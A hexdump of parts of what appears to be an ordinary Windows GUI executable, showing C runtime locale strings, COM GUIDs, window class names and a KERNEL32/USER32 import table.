00064b40  63 68 69 6c 65 00 00 00  73 70 61 6e 69 73 68 2d  |chile...spanish-|
00064b50  62 6f 6c 69 76 69 61 00  73 70 61 6e 69 73 68 2d  |bolivia.spanish-|
00064b60  61 72 67 65 6e 74 69 6e  61 00 00 00 70 6f 72 74  |argentina...port|
00064b70  75 67 75 65 73 65 2d 62  72 61 7a 69 6c 69 61 6e  |uguese-brazilian|
00064b80  00 00 00 00 6e 6f 72 77  65 67 69 61 6e 2d 6e 79  |....norwegian-ny|
00064b90  6e 6f 72 73 6b 00 00 00  6e 6f 72 77 65 67 69 61  |norsk...norwegia|
00064ba0  6e 2d 62 6f 6b 6d 61 6c  00 00 00 00 6e 6f 72 77  |n-bokmal....norw|
00064bb0  65 67 69 61 6e 00 00 00  69 74 61 6c 69 61 6e 2d  |egian...italian-|
00064bc0  73 77 69 73 73 00 00 00  69 72 69 73 68 2d 65 6e  |swiss...irish-en|
00064bd0  67 6c 69 73 68 00 00 00  67 65 72 6d 61 6e 2d 73  |glish...german-s|
00064be0  77 69 73 73 00 00 00 00  67 65 72 6d 61 6e 2d 6c  |wiss....german-l|
00064bf0  75 78 65 6d 62 6f 75 72  67 00 00 00 67 65 72 6d  |uxembourg...germ|
00064c00  61 6e 2d 6c 69 63 68 74  65 6e 73 74 65 69 6e 00  |an-lichtenstein.|
00064c10  67 65 72 6d 61 6e 2d 61  75 73 74 72 69 61 6e 00  |german-austrian.|
00064c20  66 72 65 6e 63 68 2d 73  77 69 73 73 00 00 00 00  |french-swiss....|
00064c30  66 72 65 6e 63 68 2d 6c  75 78 65 6d 62 6f 75 72  |french-luxembour|
00064c40  67 00 00 00 66 72 65 6e  63 68 2d 63 61 6e 61 64  |g...french-canad|
00064c50  69 61 6e 00 66 72 65 6e  63 68 2d 62 65 6c 67 69  |ian.french-belgi|
00064c60  61 6e 00 00 65 6e 67 6c  69 73 68 2d 75 73 61 00  |an..english-usa.|
00064c70  65 6e 67 6c 69 73 68 2d  75 73 00 00 65 6e 67 6c  |english-us..engl|
00064c80  69 73 68 2d 75 6b 00 00  65 6e 67 6c 69 73 68 2d  |ish-uk..english-|
00064c90  74 72 69 6e 69 64 61 64  20 79 20 74 6f 62 61 67  |trinidad y tobag|
00064ca0  6f 00 00 00 65 6e 67 6c  69 73 68 2d 73 6f 75 74  |o...english-sout|
00064cb0  68 20 61 66 72 69 63 61  00 00 00 00 65 6e 67 6c  |h africa....engl|
00064cc0  69 73 68 2d 6e 7a 00 00  65 6e 67 6c 69 73 68 2d  |ish-nz..english-|
00064cd0  6a 61 6d 61 69 63 61 00  65 6e 67 6c 69 73 68 2d  |jamaica.english-|
00064ce0  69 72 65 00 65 6e 67 6c  69 73 68 2d 63 61 72 69  |ire.english-cari|
00064cf0  62 62 65 61 6e 00 00 00  65 6e 67 6c 69 73 68 2d  |bbean...english-|
00064d00  63 61 6e 00 65 6e 67 6c  69 73 68 2d 62 65 6c 69  |can.english-beli|
00064d10  7a 65 00 00 65 6e 67 6c  69 73 68 2d 61 75 73 00  |ze..english-aus.|
00064d20  65 6e 67 6c 69 73 68 2d  61 6d 65 72 69 63 61 6e  |english-american|
00064d30  00 00 00 00 64 75 74 63  68 2d 62 65 6c 67 69 61  |....dutch-belgia|
00064d40  6e 00 00 00 63 68 69 6e  65 73 65 2d 74 72 61 64  |n...chinese-trad|
00064d50  69 74 69 6f 6e 61 6c 00  63 68 69 6e 65 73 65 2d  |itional.chinese-|
00064d60  73 69 6e 67 61 70 6f 72  65 00 00 00 63 68 69 6e  |singapore...chin|
00064d70  65 73 65 2d 73 69 6d 70  6c 69 66 69 65 64 00 00  |ese-simplified..|
00064d80  63 68 69 6e 65 73 65 2d  68 6f 6e 67 6b 6f 6e 67  |chinese-hongkong|
00064d90  00 00 00 00 63 68 69 6e  65 73 65 00 63 68 69 00  |....chinese.chi.|
00064da0  63 68 68 00 63 61 6e 61  64 69 61 6e 00 00 00 00  |chh.canadian....|
00064db0  62 65 6c 67 69 61 6e 00  61 75 73 74 72 61 6c 69  |belgian.australi|
00064dc0  61 6e 00 00 61 6d 65 72  69 63 61 6e 2d 65 6e 67  |an..american-eng|
00064dd0  6c 69 73 68 00 00 00 00  61 6d 65 72 69 63 61 6e  |lish....american|
00064de0  20 65 6e 67 6c 69 73 68  00 00 00 00 61 6d 65 72  | english....amer|
00064df0  69 63 61 6e 00 00 00 00  4f 43 50 00 41 43 50 00  |ican....OCP.ACP.|
00064e00  31 23 51 4e 41 4e 00 00  31 23 49 4e 46 00 00 00  |1#QNAN..1#INF...|
00064e10  31 23 49 4e 44 00 00 00  31 23 53 4e 41 4e 00 00  |1#IND...1#SNAN..|
00064e20  ff ff ff ff 7a ba 42 00  7e ba 42 00 ff ff ff ff  |⚠⚠⚠⚠z⚠B.~⚠B.⚠⚠⚠⚠|
00064e30  d7 ba 42 00 db ba 42 00  ff ff ff ff 95 c2 42 00  |⚠⚠B.⚠⚠B.⚠⚠⚠⚠.⚠B.|
00064e40  99 c2 42 00 ff ff ff ff  04 c3 42 00 08 c3 42 00  |.⚠B.⚠⚠⚠⚠.⚠B..⚠B.|
00064e50  ff ff ff ff 85 c6 42 00  89 c6 42 00 00 00 00 00  |⚠⚠⚠⚠.⚠B..⚠B.....|
00064e60  ff ff ff ff 9e c7 42 00  a2 c7 42 00 00 00 00 00  |⚠⚠⚠⚠.⚠B.⚠⚠B.....|
00064e70  00 04 02 00 00 00 00 00  c0 00 00 00 00 00 00 46  |........⚠......F|
00064e80  00 01 00 00 00 00 00 00  c0 00 00 00 00 00 00 46  |........⚠......F|
00064e90  1b 01 00 00 00 00 00 00  c0 00 00 00 00 00 00 46  |........⚠......F|
00064ea0  16 01 00 00 00 00 00 00  c0 00 00 00 00 00 00 46  |........⚠......F|
00064eb0  03 e0 f6 be 74 a8 1a 10  8b ba 00 aa 00 30 0c ab  |.⚠⚠⚠t⚠...⚠.⚠.0.⚠|
00064ec0  e4 60 7c 49 23 71 cf 11  b1 71 00 aa 00 57 59 9e  |⚠`|I#q⚠.⚠q.⚠.WY.|
00064ed0  e3 60 7c 49 23 71 cf 11  b1 71 00 aa 00 57 59 9e  |⚠`|I#q⚠.⚠q.⚠.WY.|
00064ee0  e2 60 7c 49 23 71 cf 11  b1 71 00 aa 00 57 59 9e  |⚠`|I#q⚠.⚠q.⚠.WY.|
00064ef0  e1 60 7c 49 23 71 cf 11  b1 71 00 aa 00 57 59 9e  |⚠`|I#q⚠.⚠q.⚠.WY.|
00064f00  e0 60 7c 49 23 71 cf 11  b1 71 00 aa 00 57 59 9e  |⚠`|I#q⚠.⚠q.⚠.WY.|
00064f10  84 50 b1 0f 41 af ce 11  bd 2b 20 4c 4f 4f 50 20  |.P⚠.A⚠⚠.⚠+ LOOP |
00064f20  e1 d9 6a 3a b9 23 cf 11  ad 60 00 aa 00 a7 4c cd  |⚠⚠j:⚠#⚠.⚠`.⚠.⚠L⚠|
00064f30  e0 d9 6a 3a b9 23 cf 11  ad 60 00 aa 00 a7 4c cd  |⚠⚠j:⚠#⚠.⚠`.⚠.⚠L⚠|
00064f40  e2 d9 6a 3a b9 23 cf 11  ad 60 00 aa 00 a7 4c cd  |⚠⚠j:⚠#⚠.⚠`.⚠.⚠L⚠|
00064f50  cb 22 b5 c8 f3 5c ce 11  ad e5 00 aa 00 44 77 3d  |⚠"⚠⚠⚠\⚠.⚠⚠.⚠.Dw=|
[....]
00066200  c0 00 00 00 00 00 00 46  16 00 00 00 00 00 00 00  |⚠......F........|
00066210  c0 00 00 00 00 00 00 46  0e 01 00 00 00 00 00 00  |⚠......F........|
00066220  c0 00 00 00 00 00 00 46  03 01 00 00 00 00 00 00  |⚠......F........|
00066230  c0 00 00 00 00 00 00 46  42 75 74 74 6f 6e 00 00  |⚠......FButton..|
00066240  00 00 00 00 00 00 00 00  00 00 00 00 00 fc 42 00  |.............⚠B.|
00066250  20 ef 42 00 01 00 00 00  4c 69 73 74 42 6f 78 00  | ⚠B.....ListBox.|
00066260  00 00 00 00 00 00 00 00  00 00 00 00 d0 05 43 00  |............⚠.C.|
00066270  a0 ef 42 00 02 00 00 00  45 64 69 74 00 00 00 00  |⚠⚠B.....Edit....|
00066280  00 00 00 00 00 00 00 00  00 00 00 00 70 03 43 00  |............p.C.|
00066290  50 ef 42 00 04 00 00 00  43 6f 6d 62 6f 42 6f 78  |P⚠B.....ComboBox|
000662a0  00 00 00 00 00 00 00 00  00 00 00 00 00 06 43 00  |..............C.|
000662b0  30 f0 42 00 08 00 00 00  53 74 61 74 69 63 00 00  |0⚠B.....Static..|
000662c0  00 00 00 00 00 00 00 00  00 00 00 00 d0 08 43 00  |............⚠.C.|
000662d0  00 f1 42 00 30 00 00 00  43 6f 6d 62 6f 4c 42 6f  |.⚠B.0...ComboLBo|
000662e0  78 00 00 00 00 00 00 00  00 00 00 00 d0 05 43 00  |x...........⚠.C.|
000662f0  f0 ef 42 00 02 00 00 00  14 00 0f 00 10 00 12 00  |⚠⚠B.............|
00066300  05 00 08 00 11 00 06 00  18 18 47 00 00 00 00 00  |..........G.....|
00066310  00 00 00 00 ff ff ff ff  00 00 00 00 00 00 00 00  |....⚠⚠⚠⚠........|
[....]
0006df70  5a fe 06 00 ec ff 06 00  04 00 07 00 2c 00 07 00  |Z⚠..⚠⚠......,...|
0006df80  58 00 07 00 40 00 07 00  98 fe 06 00 86 fe 06 00  |X...@....⚠...⚠..|
0006df90  76 fe 06 00 00 00 00 00  08 00 00 80 00 00 00 00  |v⚠..............|
0006dfa0  c7 01 4c 6f 61 64 52 65  73 6f 75 72 63 65 00 00  |⚠.LoadResource..|
0006dfb0  a3 00 46 69 6e 64 52 65  73 6f 75 72 63 65 41 00  |⚠.FindResourceA.|
0006dfc0  d5 01 4c 6f 63 6b 52 65  73 6f 75 72 63 65 00 00  |⚠.LockResource..|
0006dfd0  88 01 47 6c 6f 62 61 6c  46 72 65 65 00 00 93 01  |..GlobalFree....|
0006dfe0  47 6c 6f 62 61 6c 55 6e  6c 6f 63 6b 00 00 8c 01  |GlobalUnlock....|
0006dff0  47 6c 6f 62 61 6c 4c 6f  63 6b 00 00 3e 01 47 65  |GlobalLock..>.Ge|
0006e000  74 50 72 6f 63 41 64 64  72 65 73 73 00 00 26 01  |tProcAddress..&.|
0006e010  47 65 74 4d 6f 64 75 6c  65 48 61 6e 64 6c 65 41  |GetModuleHandleA|
0006e020  00 00 02 03 6c 73 74 72  63 70 79 41 00 00 83 01  |....lstrcpyA....|
0006e030  47 6c 6f 62 61 6c 44 65  6c 65 74 65 41 74 6f 6d  |GlobalDeleteAtom|
0006e040  00 00 84 01 47 6c 6f 62  61 6c 46 69 6e 64 41 74  |....GlobalFindAt|
0006e050  6f 6d 41 00 7f 01 47 6c  6f 62 61 6c 41 64 64 41  |omA...GlobalAddA|
0006e060  74 6f 6d 41 00 00 ff 02  6c 73 74 72 63 6d 70 69  |tomA..⚠.lstrcmpi|
0006e070  41 00 89 01 47 6c 6f 62  61 6c 47 65 74 41 74 6f  |A...GlobalGetAto|
0006e080  6d 4e 61 6d 65 41 00 00  fa 00 47 65 74 43 75 72  |mNameA..⚠.GetCur|
0006e090  72 65 6e 74 54 68 72 65  61 64 49 64 00 00 f9 02  |rentThreadId..⚠.|
0006e0a0  6c 73 74 72 63 61 74 41  00 00 74 01 47 65 74 56  |lstrcatA..t.GetV|
0006e0b0  65 72 73 69 6f 6e 00 00  b4 00 46 72 65 65 4c 69  |ersion..⚠.FreeLi|
0006e0c0  62 72 61 72 79 00 c2 01  4c 6f 61 64 4c 69 62 72  |brary.⚠.LoadLibr|
0006e0d0  61 72 79 41 00 00 71 02  53 65 74 4c 61 73 74 45  |aryA..q.SetLastE|
0006e0e0  72 72 6f 72 00 00 e3 01  4d 75 6c 44 69 76 00 00  |rror..⚠.MulDiv..|
0006e0f0  24 01 47 65 74 4d 6f 64  75 6c 65 46 69 6c 65 4e  |$.GetModuleFileN|
0006e100  61 6d 65 41 00 00 05 03  6c 73 74 72 63 70 79 6e  |ameA....lstrcpyn|
0006e110  41 00 08 03 6c 73 74 72  6c 65 6e 41 00 00 b0 01  |A...lstrlenA..⚠.|
0006e120  49 6e 74 65 72 6c 6f 63  6b 65 64 49 6e 63 72 65  |InterlockedIncre|
0006e130  6d 65 6e 74 00 00 ad 01  49 6e 74 65 72 6c 6f 63  |ment..⚠.Interloc|
0006e140  6b 65 64 44 65 63 72 65  6d 65 6e 74 00 00 d2 02  |kedDecrement..⚠.|
0006e150  57 69 64 65 43 68 61 72  54 6f 4d 75 6c 74 69 42  |WideCharToMultiB|
0006e160  79 74 65 00 e4 01 4d 75  6c 74 69 42 79 74 65 54  |yte.⚠.MultiByteT|
0006e170  6f 57 69 64 65 43 68 61  72 00 fc 02 6c 73 74 72  |oWideChar.⚠.lstr|
0006e180  63 6d 70 41 00 00 f9 00  47 65 74 43 75 72 72 65  |cmpA..⚠.GetCurre|
0006e190  6e 74 54 68 72 65 61 64  00 00 81 01 47 6c 6f 62  |ntThread....Glob|
0006e1a0  61 6c 41 6c 6c 6f 63 00  1b 00 43 6c 6f 73 65 48  |alAlloc...CloseH|
0006e1b0  61 6e 64 6c 65 00 ce 02  57 61 69 74 46 6f 72 53  |andle.⚠.WaitForS|
0006e1c0  69 6e 67 6c 65 4f 62 6a  65 63 74 00 65 02 53 65  |ingleObject.e.Se|
0006e1d0  74 45 76 65 6e 74 00 00  2c 02 52 65 73 75 6d 65  |tEvent..,.Resume|
0006e1e0  54 68 72 65 61 64 00 00  87 02 53 65 74 54 68 72  |Thread....SetThr|
0006e1f0  65 61 64 50 72 69 6f 72  69 74 79 00 98 02 53 75  |eadPriority...Su|
0006e200  73 70 65 6e 64 54 68 72  65 61 64 00 31 00 43 72  |spendThread.1.Cr|
0006e210  65 61 74 65 45 76 65 6e  74 41 00 00 34 01 47 65  |eateEventA..4.Ge|
0006e220  74 50 72 69 76 61 74 65  50 72 6f 66 69 6c 65 49  |tPrivateProfileI|
0006e230  6e 74 41 00 3a 01 47 65  74 50 72 69 76 61 74 65  |ntA.:.GetPrivate|
0006e240  50 72 6f 66 69 6c 65 53  74 72 69 6e 67 41 00 00  |ProfileStringA..|
0006e250  e5 02 57 72 69 74 65 50  72 69 76 61 74 65 50 72  |⚠.WritePrivatePr|
0006e260  6f 66 69 6c 65 53 74 72  69 6e 67 41 00 00 0d 01  |ofileStringA....|
0006e270  47 65 74 46 69 6c 65 41  74 74 72 69 62 75 74 65  |GetFileAttribute|
0006e280  73 41 00 00 63 01 47 65  74 54 65 6d 70 46 69 6c  |sA..c.GetTempFil|
0006e290  65 4e 61 6d 65 41 00 00  16 01 47 65 74 46 75 6c  |eNameA....GetFul|
0006e2a0  6c 50 61 74 68 4e 61 6d  65 41 00 00 6c 02 53 65  |lPathNameA..l.Se|
0006e2b0  74 46 69 6c 65 54 69 6d  65 00 14 01 47 65 74 46  |tFileTime...GetF|
0006e2c0  69 6c 65 54 69 6d 65 00  00 01 47 65 74 44 69 73  |ileTime...GetDis|
0006e2d0  6b 46 72 65 65 53 70 61  63 65 41 00 1a 01 47 65  |kFreeSpaceA...Ge|
0006e2e0  74 4c 61 73 74 45 72 72  6f 72 00 00 87 01 47 6c  |tLastError....Gl|
0006e2f0  6f 62 61 6c 46 6c 61 67  73 00 95 02 53 69 7a 65  |obalFlags...Size|
0006e300  6f 66 52 65 73 6f 75 72  63 65 00 00 c8 01 4c 6f  |ofResource..⚠.Lo|
0006e310  63 61 6c 41 6c 6c 6f 63  00 00 cc 01 4c 6f 63 61  |calAlloc..⚠.Loca|
0006e320  6c 46 72 65 65 00 aa 01  49 6e 69 74 69 61 6c 69  |lFree.⚠.Initiali|
0006e330  7a 65 43 72 69 74 69 63  61 6c 53 65 63 74 69 6f  |zeCriticalSectio|
0006e340  6e 00 a2 02 54 6c 73 41  6c 6c 6f 63 00 00 55 00  |n.⚠.TlsAlloc..U.|
0006e350  44 65 6c 65 74 65 43 72  69 74 69 63 61 6c 53 65  |DeleteCriticalSe|
0006e360  63 74 69 6f 6e 00 8b 01  47 6c 6f 62 61 6c 48 61  |ction...GlobalHa|
0006e370  6e 64 6c 65 00 00 a3 02  54 6c 73 46 72 65 65 00  |ndle..⚠.TlsFree.|
0006e380  c1 01 4c 65 61 76 65 43  72 69 74 69 63 61 6c 53  |⚠.LeaveCriticalS|
0006e390  65 63 74 69 6f 6e 00 00  8f 01 47 6c 6f 62 61 6c  |ection....Global|
0006e3a0  52 65 41 6c 6c 6f 63 00  66 00 45 6e 74 65 72 43  |ReAlloc.f.EnterC|
0006e3b0  72 69 74 69 63 61 6c 53  65 63 74 69 6f 6e 00 00  |riticalSection..|
0006e3c0  a5 02 54 6c 73 53 65 74  56 61 6c 75 65 00 cf 01  |⚠.TlsSetValue.⚠.|
0006e3d0  4c 6f 63 61 6c 52 65 41  6c 6c 6f 63 00 00 a4 02  |LocalReAlloc..⚠.|
0006e3e0  54 6c 73 47 65 74 56 61  6c 75 65 00 45 01 47 65  |TlsGetValue.E.Ge|
0006e3f0  74 50 72 6f 63 65 73 73  56 65 72 73 69 6f 6e 00  |tProcessVersion.|
0006e400  bf 00 47 65 74 43 50 49  6e 66 6f 00 31 01 47 65  |⚠.GetCPInfo.1.Ge|
0006e410  74 4f 45 4d 43 50 00 00  af 00 46 6f 72 6d 61 74  |tOEMCP..⚠.Format|
0006e420  4d 65 73 73 61 67 65 41  00 00 f5 00 47 65 74 43  |MessageA..⚠.GetC|
0006e430  75 72 72 65 6e 74 44 69  72 65 63 74 6f 72 79 41  |urrentDirectoryA|
0006e440  00 00 68 01 47 65 74 54  68 72 65 61 64 4c 6f 63  |..h.GetThreadLoc|
0006e450  61 6c 65 00 63 00 44 75  70 6c 69 63 61 74 65 48  |ale.c.DuplicateH|
0006e460  61 6e 64 6c 65 00 f7 00  47 65 74 43 75 72 72 65  |andle.⚠.GetCurre|
0006e470  6e 74 50 72 6f 63 65 73  73 00 34 00 43 72 65 61  |ntProcess.4.Crea|
0006e480  74 65 46 69 6c 65 41 00  18 02 52 65 61 64 46 69  |teFileA...ReadFi|
0006e490  6c 65 00 00 df 02 57 72  69 74 65 46 69 6c 65 00  |le..⚠.WriteFile.|
0006e4a0  6a 02 53 65 74 46 69 6c  65 50 6f 69 6e 74 65 72  |j.SetFilePointer|
0006e4b0  00 00 aa 00 46 6c 75 73  68 46 69 6c 65 42 75 66  |..⚠.FlushFileBuf|
0006e4c0  66 65 72 73 00 00 d3 01  4c 6f 63 6b 46 69 6c 65  |fers..⚠.LockFile|
0006e4d0  00 00 ae 02 55 6e 6c 6f  63 6b 46 69 6c 65 00 00  |..⚠.UnlockFile..|
0006e4e0  61 02 53 65 74 45 6e 64  4f 66 46 69 6c 65 00 00  |a.SetEndOfFile..|
0006e4f0  dd 01 4d 6f 76 65 46 69  6c 65 41 00 57 00 44 65  |⚠.MoveFileA.W.De|
0006e500  6c 65 74 65 46 69 6c 65  41 00 90 00 46 69 6e 64  |leteFileA...Find|
0006e510  43 6c 6f 73 65 00 94 00  46 69 6e 64 46 69 72 73  |Close...FindFirs|
0006e520  74 46 69 6c 65 41 00 00  77 01 47 65 74 56 6f 6c  |tFileA..w.GetVol|
0006e530  75 6d 65 49 6e 66 6f 72  6d 61 74 69 6f 6e 41 00  |umeInformationA.|
0006e540  54 01 47 65 74 53 74 72  69 6e 67 54 79 70 65 45  |T.GetStringTypeE|
0006e550  78 41 00 00 4e 01 47 65  74 53 68 6f 72 74 50 61  |xA..N.GetShortPa|
0006e560  74 68 4e 61 6d 65 41 00  12 01 47 65 74 46 69 6c  |thNameA...GetFil|
0006e570  65 53 69 7a 65 00 ca 01  4c 6f 63 61 6c 46 69 6c  |eSize.⚠.LocalFil|
0006e580  65 54 69 6d 65 54 6f 46  69 6c 65 54 69 6d 65 00  |eTimeToFileTime.|
0006e590  9b 02 53 79 73 74 65 6d  54 69 6d 65 54 6f 46 69  |..SystemTimeToFi|
0006e5a0  6c 65 54 69 6d 65 00 00  68 02 53 65 74 46 69 6c  |leTime..h.SetFil|
0006e5b0  65 41 74 74 72 69 62 75  74 65 73 41 00 00 64 02  |eAttributesA..d.|
0006e5c0  53 65 74 45 72 72 6f 72  4d 6f 64 65 00 00 09 03  |SetErrorMode....|
0006e5d0  6c 73 74 72 6c 65 6e 57  00 00 8a 00 46 69 6c 65  |lstrlenW....File|
0006e5e0  54 69 6d 65 54 6f 53 79  73 74 65 6d 54 69 6d 65  |TimeToSystemTime|
0006e5f0  00 00 89 00 46 69 6c 65  54 69 6d 65 54 6f 4c 6f  |....FileTimeToLo|
0006e600  63 61 6c 46 69 6c 65 54  69 6d 65 00 6d 01 47 65  |calFileTime.m.Ge|
0006e610  74 54 69 63 6b 43 6f 75  6e 74 00 00 90 01 47 6c  |tTickCount....Gl|
0006e620  6f 62 61 6c 53 69 7a 65  00 00 28 00 43 6f 70 79  |obalSize..(.Copy|
0006e630  46 69 6c 65 41 00 2f 02  52 74 6c 55 6e 77 69 6e  |FileA./.RtlUnwin|
0006e640  64 00 50 01 47 65 74 53  74 61 72 74 75 70 49 6e  |d.P.GetStartupIn|
0006e650  66 6f 41 00 ca 00 47 65  74 43 6f 6d 6d 61 6e 64  |foA.⚠.GetCommand|
0006e660  4c 69 6e 65 41 00 7d 00  45 78 69 74 50 72 6f 63  |LineA.}.ExitProc|
0006e670  65 73 73 00 0b 02 52 61  69 73 65 45 78 63 65 70  |ess...RaiseExcep|
0006e680  74 69 6f 6e 00 00 99 01  48 65 61 70 41 6c 6c 6f  |tion....HeapAllo|
0006e690  63 00 9f 01 48 65 61 70  46 72 65 65 00 00 9e 02  |c...HeapFree....|
0006e6a0  54 65 72 6d 69 6e 61 74  65 50 72 6f 63 65 73 73  |TerminateProcess|
0006e6b0  00 00 4a 00 43 72 65 61  74 65 54 68 72 65 61 64  |..J.CreateThread|
0006e6c0  00 00 7e 00 45 78 69 74  54 68 72 65 61 64 00 00  |..~.ExitThread..|
0006e6d0  a2 01 48 65 61 70 52 65  41 6c 6c 6f 63 00 a3 01  |⚠.HeapReAlloc.⚠.|
0006e6e0  48 65 61 70 53 69 7a 65  00 00 b9 00 47 65 74 41  |HeapSize..⚠.GetA|
0006e6f0  43 50 00 00 70 01 47 65  74 54 69 6d 65 5a 6f 6e  |CP..p.GetTimeZon|
0006e700  65 49 6e 66 6f 72 6d 61  74 69 6f 6e 00 00 5d 01  |eInformation..].|
0006e710  47 65 74 53 79 73 74 65  6d 54 69 6d 65 00 1b 01  |GetSystemTime...|
0006e720  47 65 74 4c 6f 63 61 6c  54 69 6d 65 00 00 ad 02  |GetLocalTime..⚠.|
0006e730  55 6e 68 61 6e 64 6c 65  64 45 78 63 65 70 74 69  |UnhandledExcepti|
0006e740  6f 6e 46 69 6c 74 65 72  00 00 b2 00 46 72 65 65  |onFilter..⚠.Free|
0006e750  45 6e 76 69 72 6f 6e 6d  65 6e 74 53 74 72 69 6e  |EnvironmentStrin|
0006e760  67 73 41 00 b3 00 46 72  65 65 45 6e 76 69 72 6f  |gsA.⚠.FreeEnviro|
0006e770  6e 6d 65 6e 74 53 74 72  69 6e 67 73 57 00 06 01  |nmentStringsW...|
0006e780  47 65 74 45 6e 76 69 72  6f 6e 6d 65 6e 74 53 74  |GetEnvironmentSt|
0006e790  72 69 6e 67 73 00 08 01  47 65 74 45 6e 76 69 72  |rings...GetEnvir|
0006e7a0  6f 6e 6d 65 6e 74 53 74  72 69 6e 67 73 57 00 00  |onmentStringsW..|
0006e7b0  6d 02 53 65 74 48 61 6e  64 6c 65 43 6f 75 6e 74  |m.SetHandleCount|
0006e7c0  00 00 52 01 47 65 74 53  74 64 48 61 6e 64 6c 65  |..R.GetStdHandle|
0006e7d0  00 00 15 01 47 65 74 46  69 6c 65 54 79 70 65 00  |....GetFileType.|
0006e7e0  9d 01 48 65 61 70 44 65  73 74 72 6f 79 00 9b 01  |..HeapDestroy...|
0006e7f0  48 65 61 70 43 72 65 61  74 65 00 00 bf 02 56 69  |HeapCreate..⚠.Vi|
0006e800  72 74 75 61 6c 46 72 65  65 00 85 00 46 61 74 61  |rtualFree...Fata|
0006e810  6c 41 70 70 45 78 69 74  41 00 8b 02 53 65 74 55  |lAppExitA...SetU|
0006e820  6e 68 61 6e 64 6c 65 64  45 78 63 65 70 74 69 6f  |nhandledExceptio|
0006e830  6e 46 69 6c 74 65 72 00  bb 02 56 69 72 74 75 61  |nFilter.⚠.Virtua|
0006e840  6c 41 6c 6c 6f 63 00 00  b8 01 49 73 42 61 64 57  |lAlloc..⚠.IsBadW|
0006e850  72 69 74 65 50 74 72 00  bf 01 4c 43 4d 61 70 53  |ritePtr.⚠.LCMapS|
0006e860  74 72 69 6e 67 41 00 00  c0 01 4c 43 4d 61 70 53  |tringA..⚠.LCMapS|
0006e870  74 72 69 6e 67 57 00 00  53 01 47 65 74 53 74 72  |tringW..S.GetStr|
0006e880  69 6e 67 54 79 70 65 41  00 00 56 01 47 65 74 53  |ingTypeA..V.GetS|
0006e890  74 72 69 6e 67 54 79 70  65 57 00 00 96 02 53 6c  |tringTypeW....Sl|
0006e8a0  65 65 70 00 b5 01 49 73  42 61 64 52 65 61 64 50  |eep.⚠.IsBadReadP|
0006e8b0  74 72 00 00 b2 01 49 73  42 61 64 43 6f 64 65 50  |tr..⚠.IsBadCodeP|
0006e8c0  74 72 00 00 7c 02 53 65  74 53 74 64 48 61 6e 64  |tr..|.SetStdHand|
0006e8d0  6c 65 00 00 be 01 49 73  56 61 6c 69 64 4c 6f 63  |le..⚠.IsValidLoc|
0006e8e0  61 6c 65 00 bd 01 49 73  56 61 6c 69 64 43 6f 64  |ale.⚠.IsValidCod|
0006e8f0  65 50 61 67 65 00 1c 01  47 65 74 4c 6f 63 61 6c  |ePage...GetLocal|
0006e900  65 49 6e 66 6f 41 00 00  77 00 45 6e 75 6d 53 79  |eInfoA..w.EnumSy|
0006e910  73 74 65 6d 4c 6f 63 61  6c 65 73 41 00 00 71 01  |stemLocalesA..q.|
0006e920  47 65 74 55 73 65 72 44  65 66 61 75 6c 74 4c 43  |GetUserDefaultLC|
0006e930  49 44 00 00 75 01 47 65  74 56 65 72 73 69 6f 6e  |ID..u.GetVersion|
0006e940  45 78 41 00 41 02 53 65  74 43 6f 6e 73 6f 6c 65  |ExA.A.SetConsole|
0006e950  43 74 72 6c 48 61 6e 64  6c 65 72 00 21 00 43 6f  |CtrlHandler.!.Co|
0006e960  6d 70 61 72 65 53 74 72  69 6e 67 41 00 00 22 00  |mpareStringA..".|
0006e970  43 6f 6d 70 61 72 65 53  74 72 69 6e 67 57 00 00  |CompareStringW..|
0006e980  62 02 53 65 74 45 6e 76  69 72 6f 6e 6d 65 6e 74  |b.SetEnvironment|
0006e990  56 61 72 69 61 62 6c 65  41 00 1d 01 47 65 74 4c  |VariableA...GetL|
0006e9a0  6f 63 61 6c 65 49 6e 66  6f 57 00 00 4b 45 52 4e  |ocaleInfoW..KERN|
0006e9b0  45 4c 33 32 2e 64 6c 6c  00 00 14 02 53 65 6e 64  |EL32.dll....Send|
0006e9c0  4d 65 73 73 61 67 65 41  00 00 b7 00 45 6e 61 62  |MessageA..⚠.Enab|
0006e9d0  6c 65 57 69 6e 64 6f 77  00 00 91 02 55 70 64 61  |leWindow....Upda|
0006e9e0  74 65 57 69 6e 64 6f 77  00 00 f0 00 47 65 74 43  |teWindow..⚠.GetC|
0006e9f0  6c 69 65 6e 74 52 65 63  74 00 7a 01 49 6e 76 61  |lientRect.z.Inva|
0006ea00  6c 69 64 61 74 65 52 65  63 74 00 00 a5 00 44 72  |lidateRect..⚠.Dr|
0006ea10  61 77 45 64 67 65 00 00  a8 00 44 72 61 77 46 72  |awEdge..⚠.DrawFr|
0006ea20  61 6d 65 43 6f 6e 74 72  6f 6c 00 00 52 02 53 65  |ameControl..R.Se|
0006ea30  74 54 69 6d 65 72 00 00  95 01 4b 69 6c 6c 54 69  |tTimer....KillTi|
0006ea40  6d 65 72 00 fd 00 47 65  74 44 43 00 fc 00 47 65  |mer.⚠.GetDC.⚠.Ge|
0006ea50  74 43 75 72 73 6f 72 50  6f 73 00 00 07 00 41 70  |tCursorPos....Ap|
0006ea60  70 65 6e 64 4d 65 6e 75  41 00 58 00 43 72 65 61  |pendMenuA.X.Crea|
0006ea70  74 65 50 6f 70 75 70 4d  65 6e 75 00 90 01 49 73  |tePopupMenu...Is|
0006ea80  57 69 6e 64 6f 77 45 6e  61 62 6c 65 64 00 02 01  |WindowEnabled...|
0006ea90  47 65 74 44 6c 67 49 74  65 6d 00 00 56 01 47 65  |GetDlgItem..V.Ge|
0006eaa0  74 57 69 6e 64 6f 77 4c  6f 6e 67 41 00 00 35 01  |tWindowLongA..5.|
0006eab0  47 65 74 50 61 72 65 6e  74 00 8e 00 44 65 73 74  |GetParent...Dest|
0006eac0  72 6f 79 57 69 6e 64 6f  77 00 4c 00 43 72 65 61  |royWindow.L.Crea|
0006ead0  74 65 44 69 61 6c 6f 67  49 6e 64 69 72 65 63 74  |teDialogIndirect|
0006eae0  50 61 72 61 6d 41 00 00  46 01 47 65 74 53 79 73  |ParamA..F.GetSys|
0006eaf0  74 65 6d 4d 65 74 72 69  63 73 00 00 8f 01 49 73  |temMetrics....Is|
0006eb00  57 69 6e 64 6f 77 00 00  1c 02 53 65 74 41 63 74  |Window....SetAct|
0006eb10  69 76 65 57 69 6e 64 6f  77 00 dd 00 47 65 74 41  |iveWindow.⚠.GetA|
0006eb20  63 74 69 76 65 57 69 6e  64 6f 77 00 b9 00 45 6e  |ctiveWindow.⚠.En|
0006eb30  64 44 69 61 6c 6f 67 00  33 01 47 65 74 4e 65 78  |dDialog.3.GetNex|
